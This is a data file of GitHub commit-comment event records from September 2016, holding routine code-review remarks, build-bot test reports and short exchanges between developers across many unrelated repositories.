{"id":"4598147875","type":"CommitCommentEvent","actor":{"login":"james-prior"},"repo":{"name":"cohpy/challenge-201608-refactor"},"payload":{"comment":{"id":19118585,"position":null,"line":null,"path":null,"commit_id":"8c242cf8dadeb494061419be1adf69d581b3db5f","created_at":"2016-09-21T18:42:00Z","updated_at":"2016-09-21T18:42:00Z","body":"On Wed, 21 Sep 2016 10:53:09 -0700, bcostlow <notifications@github.com> wrote:\n\n> If you show this, mention the dangers of eval on untrusted imports to newbies.\n\nThanks for the reminder.\n\nI will warn newbies (and folks who ought to know better)\nabout the dangers of eval() and friends.\n\nIt's go to know that the code is getting more eyeballs.\nI look forward to seeing your entry.\n"}},"created_at":"2016-09-21T18:42:00Z"}
{"id":"4598150264","type":"CommitCommentEvent","actor":{"login":"zonkzonk"},"repo":{"name":"zonkzonk/radare2"},"payload":{"comment":{"id":19118595,"position":4,"line":1473,"path":"libr/debug/p/native/linux/linux_coredump.c","commit_id":"cbb87b810a5cf8d6178af56bd0825e42b0df228f","created_at":"2016-09-21T18:42:25Z","updated_at":"2016-09-21T18:42:25Z","body":"just saying: it was not on purpose, to add redundant stuff"}},"created_at":"2016-09-21T18:42:25Z"}
{"id":"4598153757","type":"CommitCommentEvent","actor":{"login":"CTXz"},"repo":{"name":"Lightn1ng/arch_install_script"},"payload":{"comment":{"id":19118605,"position":null,"line":null,"path":null,"commit_id":"2342d44d0cb7ef383f674d5386a2c01991d07223","created_at":"2016-09-21T18:43:03Z","updated_at":"2016-09-21T18:43:03Z","body":"This is up to the config designer imo"}},"created_at":"2016-09-21T18:43:03Z"}
{"id":"4598154192","type":"CommitCommentEvent","actor":{"login":"SyncedSynapse"},"repo":{"name":"xbmc/Kore"},"payload":{"comment":{"id":19118606,"position":null,"line":null,"path":null,"commit_id":"e399c3e607e3ab2ef96cba088601fdc0b4cd442e","created_at":"2016-09-21T18:43:08Z","updated_at":"2016-09-21T18:43:08Z","body":"Sorry for this, i forgot that updating the build tools would have other implications..."}},"created_at":"2016-09-21T18:43:08Z"}
{"id":"4598154235","type":"CommitCommentEvent","actor":{"login":"kpedro88"},"repo":{"name":"cferraio/cmssw"},"payload":{"comment":{"id":19118607,"position":4,"line":29,"path":"EventFilter/HcalRawToDigi/interface/HcalUnpacker.h","commit_id":"ac087e1c3a0aea6843c789e9a73020710e9fe560","created_at":"2016-09-21T18:43:08Z","updated_at":"2016-09-21T18:43:08Z","body":"`HFDataFrame` is QIE8 for HF, not needed for RPD"}},"created_at":"2016-09-21T18:43:08Z"}
{"id":"4598154564","type":"CommitCommentEvent","actor":{"login":"cybrann"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19118609,"position":null,"line":null,"path":null,"commit_id":"6130e2929e00b8cb89e37b344668579cec6d5964","created_at":"2016-09-21T18:43:11Z","updated_at":"2016-09-21T18:43:11Z","body":"If you just add opcode numbers it does not mean anything, you need to code them too"}},"created_at":"2016-09-21T18:43:11Z"}
{"id":"4598157249","type":"CommitCommentEvent","actor":{"login":"tpetr"},"repo":{"name":"HubSpot/Singularity"},"payload":{"comment":{"id":19118618,"position":null,"line":null,"path":null,"commit_id":"c70dacf4048d16051e6898c0020a76a33daad5a4","created_at":"2016-09-21T18:43:40Z","updated_at":"2016-09-21T18:43:40Z","body":"🚢 "}},"created_at":"2016-09-21T18:43:40Z"}
{"id":"4598157468","type":"CommitCommentEvent","actor":{"login":"Glebka"},"repo":{"name":"lenapy/Spider"},"payload":{"comment":{"id":19118619,"position":17,"line":6,"path":"avitopars/avitopars/items.py","commit_id":"893996df6f7dfc63ad5e45425a14dc648d7b6df5","created_at":"2016-09-21T18:43:42Z","updated_at":"2016-09-21T18:43:42Z","body":"It isn't a good practice to commit commented code. You already use Git SCM that allows you to checkout any previous version of your work. So, simply delete your code if don't need it anymore. "}},"created_at":"2016-09-21T18:43:42Z"}
{"id":"4598157533","type":"CommitCommentEvent","actor":{"login":"jvandg"},"repo":{"name":"LukasCBossert/ijsra"},"payload":{"comment":{"id":19118620,"position":191,"line":195,"path":"2016-02/content/Ward.tex","commit_id":"f05c5971df7c79817f8ec8e713814563d5f86511","created_at":"2016-09-21T18:43:43Z","updated_at":"2016-09-21T18:43:43Z","body":"I think you are right, if it is centered when vertical it looks a bit off."}},"created_at":"2016-09-21T18:43:43Z"}
{"id":"4598158739","type":"CommitCommentEvent","actor":{"login":"bpresser123"},"repo":{"name":"bpresser123/blocitoff"},"payload":{"comment":{"id":19118625,"position":null,"line":null,"path":null,"commit_id":"124d61b36d12f187588ad48bf224c3ecf63c8cc8","created_at":"2016-09-21T18:43:58Z","updated_at":"2016-09-21T18:43:58Z","body":"Done. Thanks for the info! I checked my database through the rails console and found that the new data was created. Updates have been pushed.\r\n\r\nOverall, it seems like the seed file operates as follows:\r\n\r\n- `seeds.rb` file `requires` the `faker` gem\r\n- Moves into the first block for the user, creating 10 new user accounts\r\n- Moves into the second block for the item, creating 10 new to-do items\r\n- Then the `rake db:seed` command moves the data into the database\r\n\r\n\r\nHow is the users = User.all line functioning with the rest of this code?\r\n\r\nWhere are the name, user, email, and password variables coming from exactly? For example, from the way I understand it, you need create an empty variable somewhere in the program to store a value...I just don't see where these variables and values are stored... "}},"created_at":"2016-09-21T18:43:58Z"}
{"id":"4598159390","type":"CommitCommentEvent","actor":{"login":"TimvdLippe"},"repo":{"name":"mockito/mockito"},"payload":{"comment":{"id":19118627,"position":12,"line":30,"path":"src/main/java/org/mockito/internal/creation/bytebuddy/InlineBytecodeGenerator.java","commit_id":"9445adac915f17a56383158afa7c1ffdee765479","created_at":"2016-09-21T18:44:06Z","updated_at":"2016-09-21T18:44:06Z","body":"👍 👍 👍 👍 "}},"created_at":"2016-09-21T18:44:06Z"}
{"id":"4598161047","type":"CommitCommentEvent","actor":{"login":"EmilKraft"},"repo":{"name":"NecronomiconCoding/NecroBot-Rocket-API"},"payload":{"comment":{"id":19118630,"position":9,"line":7,"path":"README.md","commit_id":"bb35cd7308451c76b6e383317cbd91d475543218","created_at":"2016-09-21T18:44:23Z","updated_at":"2016-09-21T18:44:23Z","body":"Can I have the source files?\r\n"}},"created_at":"2016-09-21T18:44:23Z"}
{"id":"4598163163","type":"CommitCommentEvent","actor":{"login":"EmilKraft"},"repo":{"name":"NecronomiconCoding/NecroBot-Rocket-API"},"payload":{"comment":{"id":19118634,"position":null,"line":null,"path":null,"commit_id":"bb35cd7308451c76b6e383317cbd91d475543218","created_at":"2016-09-21T18:44:46Z","updated_at":"2016-09-21T18:44:46Z","body":"?? Please ??\r\n"}},"created_at":"2016-09-21T18:44:46Z"}
{"id":"4598166708","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19118638,"position":null,"line":null,"path":null,"commit_id":"c58ea292f10f671d6fc33e7484f510e29c8aa075","created_at":"2016-09-21T18:45:18Z","updated_at":"2016-09-21T18:45:18Z","body":"develop (evanweaver) - x86_64-MacOS-10.10-clang: OK (2385 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c58ea292f10f671d6fc33e7484f510e29c8aa075-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c58ea292f10f671d6fc33e7484f510e29c8aa075-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.43%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T18:45:18Z"}
{"id":"4598170414","type":"CommitCommentEvent","actor":{"login":"jvandg"},"repo":{"name":"LukasCBossert/ijsra"},"payload":{"comment":{"id":19118649,"position":215,"line":212,"path":"2016-02/content/Ward.tex","commit_id":"f05c5971df7c79817f8ec8e713814563d5f86511","created_at":"2016-09-21T18:45:58Z","updated_at":"2016-09-21T18:45:58Z","body":"Ah, makes sense and looks better. This is one I did a little searching for, so wasn't 100% about it."}},"created_at":"2016-09-21T18:45:58Z"}
{"id":"4598170725","type":"CommitCommentEvent","actor":{"login":"Fasse"},"repo":{"name":"Admidio/admidio"},"payload":{"comment":{"id":19118650,"position":null,"line":null,"path":null,"commit_id":"f5ef0e5057e10fb312ce83ddf0264b31bde12e0f","created_at":"2016-09-21T18:46:00Z","updated_at":"2016-09-21T18:46:00Z","body":"if I change something like this, than there was an error and this change fix it. But I don't know the problem that was fixed with this."}},"created_at":"2016-09-21T18:46:00Z"}
{"id":"4598171740","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19118652,"position":null,"line":null,"path":null,"commit_id":"c2d497e3ce50436f8fbadaa6c181309ecc2799d5","created_at":"2016-09-21T18:46:11Z","updated_at":"2016-09-21T18:46:11Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-MacOS-10.9-clang: Tests Failed (1761 of 2331 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c2d497e3ce50436f8fbadaa6c181309ecc2799d5-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c2d497e3ce50436f8fbadaa6c181309ecc2799d5-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-75.55%25-red.svg)</a> \n"}},"created_at":"2016-09-21T18:46:11Z"}
{"id":"4598180085","type":"CommitCommentEvent","actor":{"login":"jvandg"},"repo":{"name":"LukasCBossert/ijsra"},"payload":{"comment":{"id":19118676,"position":244,"line":261,"path":"2016-02/content/Ward.tex","commit_id":"f05c5971df7c79817f8ec8e713814563d5f86511","created_at":"2016-09-21T18:47:41Z","updated_at":"2016-09-21T18:47:41Z","body":":+1:  "}},"created_at":"2016-09-21T18:47:41Z"}
{"id":"4598181834","type":"CommitCommentEvent","actor":{"login":"KosKam"},"repo":{"name":"KosKam/test-6"},"payload":{"comment":{"id":19118682,"position":null,"line":null,"path":null,"commit_id":"e75bf093f369b35e2f178e3a4e5e3b43d576c488","created_at":"2016-09-21T18:48:01Z","updated_at":"2016-09-21T18:48:01Z","body":"It is  new"}},"created_at":"2016-09-21T18:48:01Z"}
{"id":"4598181931","type":"CommitCommentEvent","actor":{"login":"vincent-legoll"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19118683,"position":null,"line":null,"path":null,"commit_id":"c983744c64dd36390f14d08eb6f0335b50edfaef","created_at":"2016-09-21T18:48:02Z","updated_at":"2016-09-21T18:48:02Z","body":"OK, now that I'm looking deeper, the \"fair number\" was a bit exagerated :-)\r\nThe AMD one was in drivers (block & net), so I'm not touching that (even if I'll do for my own kernel)\r\n"}},"created_at":"2016-09-21T18:48:02Z"}
{"id":"4598182913","type":"CommitCommentEvent","actor":{"login":"jtrussell"},"repo":{"name":"iVantage/generator-ivh-react-component"},"payload":{"comment":{"id":19118688,"position":null,"line":null,"path":null,"commit_id":"86f6de268e0200d9e9ab215cff95405d3ae981d9","created_at":"2016-09-21T18:48:12Z","updated_at":"2016-09-21T18:48:12Z","body":"<3"}},"created_at":"2016-09-21T18:48:12Z"}
{"id":"4598184223","type":"CommitCommentEvent","actor":{"login":"dsuare1"},"repo":{"name":"dsuare1/the_round_about"},"payload":{"comment":{"id":19118693,"position":null,"line":null,"path":null,"commit_id":"d43903a9eb307e4d2368893e8a773676f259af78","created_at":"2016-09-21T18:48:27Z","updated_at":"2016-09-21T18:48:27Z","body":"-update the express middleware in 'server.js' to serve static files on the '/browse' route\r\n-browse page 'browse all' working properly; design complete (besides media queries)\r\n-update events page to only show 1 month of events"}},"created_at":"2016-09-21T18:48:27Z"}
{"id":"4598186605","type":"CommitCommentEvent","actor":{"login":"dieris"},"repo":{"name":"BBN-Q/QGL"},"payload":{"comment":{"id":19118696,"position":null,"line":null,"path":null,"commit_id":"a2be5718e954050e36d4be3d782d99b7319c6a57","created_at":"2016-09-21T18:48:53Z","updated_at":"2016-09-21T18:48:53Z","body":"I'm pretty sure I wasn't"}},"created_at":"2016-09-21T18:48:53Z"}
{"id":"4598186705","type":"CommitCommentEvent","actor":{"login":"jvandg"},"repo":{"name":"LukasCBossert/ijsra"},"payload":{"comment":{"id":19118697,"position":254,"line":274,"path":"2016-02/content/Ward.tex","commit_id":"f05c5971df7c79817f8ec8e713814563d5f86511","created_at":"2016-09-21T18:48:54Z","updated_at":"2016-09-21T18:48:54Z","body":"Haha, I do like footnotes."}},"created_at":"2016-09-21T18:48:54Z"}
{"id":"4598186876","type":"CommitCommentEvent","actor":{"login":"kpedro88"},"repo":{"name":"cferraio/cmssw"},"payload":{"comment":{"id":19118698,"position":5,"line":658,"path":"EventFilter/HcalRawToDigi/src/HcalUnpacker.cc","commit_id":"ac087e1c3a0aea6843c789e9a73020710e9fe560","created_at":"2016-09-21T18:48:56Z","updated_at":"2016-09-21T18:48:56Z","body":"Rather than hardcoding values here, I think it would be better to use existing properties of `HcalZDCDetId`:\r\nhttps://github.com/cms-sw/cmssw/blob/CMSSW_8_1_X/DataFormats/HcalDetId/src/HcalZDCDetId.cc#L18\r\nThe above line of code says that ZDC DetIds must have `gen.det()==Calo && gen.subdetId()==SubdetectorId` with\r\n`static const int SubdetectorId = 2`.\r\n\r\nIf you check for those conditions in a generic DetId, it is then safe to make an HcalZDCDetId from that generic DetId and check for the RPD enum."}},"created_at":"2016-09-21T18:48:56Z"}
{"id":"4598187526","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_core"},"payload":{"comment":{"id":19118702,"position":null,"line":null,"path":null,"commit_id":"a1b7121e5f5c210d82cc1ad0e692aa0f0db2177f","created_at":"2016-09-21T18:49:03Z","updated_at":"2016-09-21T18:49:03Z","body":"all tests pass:\nsuccess: http://buildbot.bos1/builders/test-riak_core/builds/2098\n"}},"created_at":"2016-09-21T18:49:03Z"}
{"id":"4598187992","type":"CommitCommentEvent","actor":{"login":"Murulidhar"},"repo":{"name":"iovisor/bcc"},"payload":{"comment":{"id":19118704,"position":null,"line":null,"path":null,"commit_id":"24825529bea9c5ebfd2874109c5eadfb2b086253","created_at":"2016-09-21T18:49:09Z","updated_at":"2016-09-21T18:49:09Z","body":"Hi,\r\nI want to how to solve import bcc error.\r\ni know i need to install python-bcc but not getting proper steps to install it.\r\nPlease help me out."}},"created_at":"2016-09-21T18:49:09Z"}
{"id":"4598188959","type":"CommitCommentEvent","actor":{"login":"cahrens"},"repo":{"name":"edx/edx-platform"},"payload":{"comment":{"id":19118708,"position":26,"line":661,"path":"common/lib/xmodule/xmodule/capa_base.py","commit_id":"f475f505614e81e52f1ae646433326bf46e05a4a","created_at":"2016-09-21T18:49:19Z","updated_at":"2016-09-21T18:49:19Z","body":"Nit: How about moving this initialization/logic into the helper method?"}},"created_at":"2016-09-21T18:49:19Z"}
{"id":"4598191767","type":"CommitCommentEvent","actor":{"login":"jvandg"},"repo":{"name":"LukasCBossert/ijsra"},"payload":{"comment":{"id":19118711,"position":263,"line":283,"path":"2016-02/content/Ward.tex","commit_id":"f05c5971df7c79817f8ec8e713814563d5f86511","created_at":"2016-09-21T18:49:51Z","updated_at":"2016-09-21T18:49:51Z","body":"Good to know."}},"created_at":"2016-09-21T18:49:51Z"}
{"id":"4598195686","type":"CommitCommentEvent","actor":{"login":"Glebka"},"repo":{"name":"lenapy/Spider"},"payload":{"comment":{"id":19118719,"position":40,"line":40,"path":"avitopars/avitopars/spiders/avito_spider.py","commit_id":"893996df6f7dfc63ad5e45425a14dc648d7b6df5","created_at":"2016-09-21T18:50:32Z","updated_at":"2016-09-21T18:50:32Z","body":"Unused variable here. Also, consider to replace magic number 302 with named constant. For example, httplib already defined some common HTTP error codes for you. See https://docs.python.org/2/library/httplib.html"}},"created_at":"2016-09-21T18:50:32Z"}
{"id":"4598202836","type":"CommitCommentEvent","actor":{"login":"Glebka"},"repo":{"name":"lenapy/Spider"},"payload":{"comment":{"id":19118734,"position":48,"line":48,"path":"avitopars/avitopars/spiders/avito_spider.py","commit_id":"893996df6f7dfc63ad5e45425a14dc648d7b6df5","created_at":"2016-09-21T18:51:48Z","updated_at":"2016-09-21T18:51:48Z","body":"Probably, you wanted to use handle_httpstatus_list variable here, didn't you?"}},"created_at":"2016-09-21T18:51:48Z"}
{"id":"4598203207","type":"CommitCommentEvent","actor":{"login":"jvandg"},"repo":{"name":"LukasCBossert/ijsra"},"payload":{"comment":{"id":19118736,"position":null,"line":null,"path":null,"commit_id":"f05c5971df7c79817f8ec8e713814563d5f86511","created_at":"2016-09-21T18:51:52Z","updated_at":"2016-09-21T18:51:52Z","body":"Thanks, nice updates!"}},"created_at":"2016-09-21T18:51:52Z"}
{"id":"4598204657","type":"CommitCommentEvent","actor":{"login":"hirvinen"},"repo":{"name":"gsurrel/FacebookNotifications"},"payload":{"comment":{"id":19118739,"position":null,"line":null,"path":null,"commit_id":"e9db785111a20c63ccd1aa54b25160bee8ae5d21","created_at":"2016-09-21T18:52:07Z","updated_at":"2016-09-21T18:52:07Z","body":"How did you crash this? I thought that input type number would have restricted possible values enough for those tests. "}},"created_at":"2016-09-21T18:52:07Z"}
{"id":"4598206512","type":"CommitCommentEvent","actor":{"login":"heatherbradfield"},"repo":{"name":"heatherbradfield/AnimalSounds"},"payload":{"comment":{"id":19118742,"position":null,"line":null,"path":null,"commit_id":"2537c58559957dee5dd2d9c964eddfa8b47dd2d1","created_at":"2016-09-21T18:52:26Z","updated_at":"2016-09-21T18:52:26Z","body":"meant doxygen"}},"created_at":"2016-09-21T18:52:26Z"}
{"id":"4598209977","type":"CommitCommentEvent","actor":{"login":"kpedro88"},"repo":{"name":"cferraio/cmssw"},"payload":{"comment":{"id":19118749,"position":null,"line":null,"path":null,"commit_id":"ac087e1c3a0aea6843c789e9a73020710e9fe560","created_at":"2016-09-21T18:53:00Z","updated_at":"2016-09-21T18:53:00Z","body":"Next step is to try to compile this after checking dependencies:\r\n```\r\ngit cms-checkdeps\r\n```\r\nwill show you the list of affected packages, and\r\n```\r\ngit cms-checkdeps -a\r\n```\r\nwill check out those packages so you can recompile everything.\r\n\r\nYou will find that other locations in the code need to be changed, e.g. to propagate the ZDC enum change:\r\nhttps://github.com/cms-sw/cmssw/search?utf8=%E2%9C%93&q=HcalZDCDetId%3A%3ALUM"}},"created_at":"2016-09-21T18:53:00Z"}
{"id":"4598212622","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19118759,"position":null,"line":null,"path":null,"commit_id":"c58ea292f10f671d6fc33e7484f510e29c8aa075","created_at":"2016-09-21T18:53:27Z","updated_at":"2016-09-21T18:53:27Z","body":"develop (evanweaver) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2356 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c58ea292f10f671d6fc33e7484f510e29c8aa075-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c58ea292f10f671d6fc33e7484f510e29c8aa075-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-96.24%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T18:53:27Z"}
{"id":"4598218827","type":"CommitCommentEvent","actor":{"login":"tasleson"},"repo":{"name":"tasleson/libstoragemgmt"},"payload":{"comment":{"id":19118775,"position":28,"line":42,"path":"plugin/smispy/WBEM.py","commit_id":"90d6df4e5a640fb7035114c36d90bc8c189f8db5","created_at":"2016-09-21T18:54:33Z","updated_at":"2016-09-21T18:54:33Z","body":"@andy-maier This is true for py2, not for py3."}},"created_at":"2016-09-21T18:54:33Z"}
{"id":"4598221215","type":"CommitCommentEvent","actor":{"login":"postmodern"},"repo":{"name":"jnicklas/xpath"},"payload":{"comment":{"id":19118783,"position":null,"line":null,"path":null,"commit_id":"59badfa50d645ac64c70fc6a0c2f7fe826999a1f","created_at":"2016-09-21T18:55:00Z","updated_at":"2016-09-21T18:55:00Z","body":"Might also want to think about releasing a new version, so rubygems.org will list the MIT license. Tools such as [license_finder](https://github.com/pivotal/LicenseFinder#readme) query rubygems.org, and report [xpath](https://rubygems.org/gems/xpath) as having an unknown license."}},"created_at":"2016-09-21T18:55:00Z"}
{"id":"4598221227","type":"CommitCommentEvent","actor":{"login":"gsurrel"},"repo":{"name":"gsurrel/FacebookNotifications"},"payload":{"comment":{"id":19118782,"position":null,"line":null,"path":null,"commit_id":"e9db785111a20c63ccd1aa54b25160bee8ae5d21","created_at":"2016-09-21T18:55:00Z","updated_at":"2016-09-21T18:55:00Z","body":"I was really surprised too, but a really big number (7-8 digits) crashed it. It doesn't seem too big to me for an int though...\n\nThis fix solved the problem at least, even if I don't like it that much. \n\nIl 21 settembre 2016 20:52:07 CEST, Patrik Hirvinen <notifications@github.com> ha scritto:\n>How did you crash this? I thought that input type number would have\n>restricted possible values enough for those tests. \n>\n>-- \n>You are receiving this because you authored the thread.\n>Reply to this email directly or view it on GitHub:\n>https://github.com/gsurrel/FacebookNotifications/commit/e9db785111a20c63ccd1aa54b25160bee8ae5d21#commitcomment-19118739\n\n-- \nEnvoyé depuis mon téléphone. Veuillez excuser ma brièveté."}},"created_at":"2016-09-21T18:55:00Z"}
{"id":"4598222266","type":"CommitCommentEvent","actor":{"login":"caiosba"},"repo":{"name":"meedan/check-api"},"payload":{"comment":{"id":19118785,"position":null,"line":null,"path":null,"commit_id":"4fa394ca12179a6f6f16019bf760a4b71b5a8db4","created_at":"2016-09-21T18:55:11Z","updated_at":"2016-09-21T18:55:11Z","body":"Sawy, instead of instantiating the ElasticSearch repository again, and hard-coding the index and type, it would be better to reuse the `Annotation` model, and call `search` over it directly, like here: https://github.com/meedan/check-api/blob/develop/app/models/concerns/annotation_base.rb#L15"}},"created_at":"2016-09-21T18:55:11Z"}
{"id":"4598223496","type":"CommitCommentEvent","actor":{"login":"NachiketNamjoshi"},"repo":{"name":"NachiketNamjoshi/BlackReactor_onyx"},"payload":{"comment":{"id":19118788,"position":null,"line":null,"path":null,"commit_id":"3bfeb8ff50043e7164a5033ef083958a6be56c03","created_at":"2016-09-21T18:55:23Z","updated_at":"2016-09-21T18:55:23Z","body":"-Ofast\r\n    Disregard strict standards compliance. -Ofast enables all -O3 optimizations. It also enables optimizations that are not valid for all standard-compliant programs.\r\n\r\nworks best for me. also the kernel size remains same."}},"created_at":"2016-09-21T18:55:23Z"}
{"id":"4598226130","type":"CommitCommentEvent","actor":{"login":"Amazinite"},"repo":{"name":"comnom/Eternals"},"payload":{"comment":{"id":19118797,"position":null,"line":null,"path":null,"commit_id":"28732374e62f165e753533ad6a9d7692b9dd5388","created_at":"2016-09-21T18:55:51Z","updated_at":"2016-09-21T18:55:51Z","body":":)"}},"created_at":"2016-09-21T18:55:51Z"}
{"id":"4598228025","type":"CommitCommentEvent","actor":{"login":"staubina"},"repo":{"name":"edx/edx-platform"},"payload":{"comment":{"id":19118807,"position":26,"line":661,"path":"common/lib/xmodule/xmodule/capa_base.py","commit_id":"f475f505614e81e52f1ae646433326bf46e05a4a","created_at":"2016-09-21T18:56:12Z","updated_at":"2016-09-21T18:56:12Z","body":"It is in the helper method.  If I move it then I will need to pass along the notification.  I thought about doing this, but I thought this method was more clear.  I can update this in the next push."}},"created_at":"2016-09-21T18:56:12Z"}
{"id":"4598228362","type":"CommitCommentEvent","actor":{"login":"tasleson"},"repo":{"name":"tasleson/libstoragemgmt"},"payload":{"comment":{"id":19118810,"position":29,"line":43,"path":"plugin/smispy/WBEM.py","commit_id":"90d6df4e5a640fb7035114c36d90bc8c189f8db5","created_at":"2016-09-21T18:56:16Z","updated_at":"2016-09-21T18:56:16Z","body":"@andy-maier We are supporting EPEL6 which is back on 0.7.0, so yes we need to use this older version or see if we can get a newer version in EPEL6."}},"created_at":"2016-09-21T18:56:16Z"}
{"id":"4598229996","type":"CommitCommentEvent","actor":{"login":"BurtHarris"},"repo":{"name":"BurtHarris/antlr4"},"payload":{"comment":{"id":19118820,"position":null,"line":null,"path":null,"commit_id":"98e09fa3ecea6001bccd01951afb63113843c1df","created_at":"2016-09-21T18:56:34Z","updated_at":"2016-09-21T18:56:34Z","body":"Well darn, I didn't mean to check-in all the generated .js files. "}},"created_at":"2016-09-21T18:56:34Z"}
{"id":"4598231104","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19118824,"position":null,"line":null,"path":null,"commit_id":"6130e2929e00b8cb89e37b344668579cec6d5964","created_at":"2016-09-21T18:56:45Z","updated_at":"2016-09-21T18:56:45Z","body":"I just learn it))) and fix wrong values like this:\r\n\r\n  -    CMSG_BATTLEFIELD_STATUS = 0x4A2, // client send 0x19B0 before status\r\n +    CMSG_BATTLEFIELD_STATUS = 0x04A2, // client send 0x19B0 before status"}},"created_at":"2016-09-21T18:56:45Z"}
{"id":"4598232239","type":"CommitCommentEvent","actor":{"login":"staubina"},"repo":{"name":"edx/edx-platform"},"payload":{"comment":{"id":19118830,"position":26,"line":661,"path":"common/lib/xmodule/xmodule/capa_base.py","commit_id":"f475f505614e81e52f1ae646433326bf46e05a4a","created_at":"2016-09-21T18:56:56Z","updated_at":"2016-09-21T18:56:56Z","body":"In other words I am fine with both approaches."}},"created_at":"2016-09-21T18:56:56Z"}
{"id":"4598232992","type":"CommitCommentEvent","actor":{"login":"Wndrr"},"repo":{"name":"Wndrr/Ponteilla"},"payload":{"comment":{"id":19118833,"position":null,"line":null,"path":null,"commit_id":"58a415fe0b73f9a738c803c5108a3d426106661e","created_at":"2016-09-21T18:57:04Z","updated_at":"2016-09-21T18:57:04Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;u2YsyO1Z&#x2F;57-navbar-make-logos-unclickable\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Navbar - make logos unclickable</a>"}},"created_at":"2016-09-21T18:57:04Z"}
{"id":"4598233117","type":"CommitCommentEvent","actor":{"login":"Wndrr"},"repo":{"name":"Wndrr/Ponteilla"},"payload":{"comment":{"id":19118834,"position":null,"line":null,"path":null,"commit_id":"5a4a03a7f2dee881526c33588daddfd51d181c62","created_at":"2016-09-21T18:57:06Z","updated_at":"2016-09-21T18:57:06Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;u2YsyO1Z&#x2F;57-navbar-make-logos-unclickable\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Navbar - make logos unclickable</a>"}},"created_at":"2016-09-21T18:57:06Z"}
{"id":"4598235425","type":"CommitCommentEvent","actor":{"login":"kurdtkobain"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19118838,"position":null,"line":null,"path":null,"commit_id":"e6e646da36bf4e14044de0a796f2f66520af169c","created_at":"2016-09-21T18:57:30Z","updated_at":"2016-09-21T18:57:30Z","body":"why not just add a new command instead of putting them in the sit and prone commands, I use sit to recover health personally."}},"created_at":"2016-09-21T18:57:30Z"}
{"id":"4598239604","type":"CommitCommentEvent","actor":{"login":"fschutte"},"repo":{"name":"Cerios/cerioscoop-web"},"payload":{"comment":{"id":19118845,"position":null,"line":null,"path":null,"commit_id":"3b944a295fd21a85e4e8341825b576a619911ede","created_at":"2016-09-21T18:58:17Z","updated_at":"2016-09-21T18:58:17Z","body":"Ja, maar als je dus java 8 syntax in je jsp's gebruikt moet je toch de 18 hebben. Maar het klopt dat eclipse hierover struikelt. Misschien dat ze niet verwachten dat jsp's het ooit tot java 8 zou schoppen;)"}},"created_at":"2016-09-21T18:58:17Z"}
{"id":"4598241406","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":19118849,"position":null,"line":null,"path":null,"commit_id":"72c2962565d555cc5904758eb2a2444229f96d01","created_at":"2016-09-21T18:58:37Z","updated_at":"2016-09-21T18:58:37Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.253.72c2962565d555cc5904758eb2a2444229f96d01](http://build.palaso.org/viewLog.html?buildId=77023&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1496, ignored: 17 Build time: 00:07:18"}},"created_at":"2016-09-21T18:58:37Z"}
{"id":"4598244108","type":"CommitCommentEvent","actor":{"login":"bdemers"},"repo":{"name":"stormpath/stormpath-shiro-migrate-to-servlet-plugin"},"payload":{"comment":{"id":19118858,"position":5,"line":83,"path":"pom.xml","commit_id":"115171b9fb441e5a57b7a8c9bde3184a9bcde8e9","created_at":"2016-09-21T18:59:04Z","updated_at":"2016-09-21T18:59:04Z","body":"Switch the dependency to the servlet-plugin"}},"created_at":"2016-09-21T18:59:04Z"}
{"id":"4598244212","type":"CommitCommentEvent","actor":{"login":"jvandg"},"repo":{"name":"LukasCBossert/ijsra"},"payload":{"comment":{"id":19118859,"position":null,"line":null,"path":null,"commit_id":"f05c5971df7c79817f8ec8e713814563d5f86511","created_at":"2016-09-21T18:59:05Z","updated_at":"2016-09-21T18:59:05Z","body":"And a nice and straightforward write-up @DevinWard, thanks for making it easy."}},"created_at":"2016-09-21T18:59:05Z"}
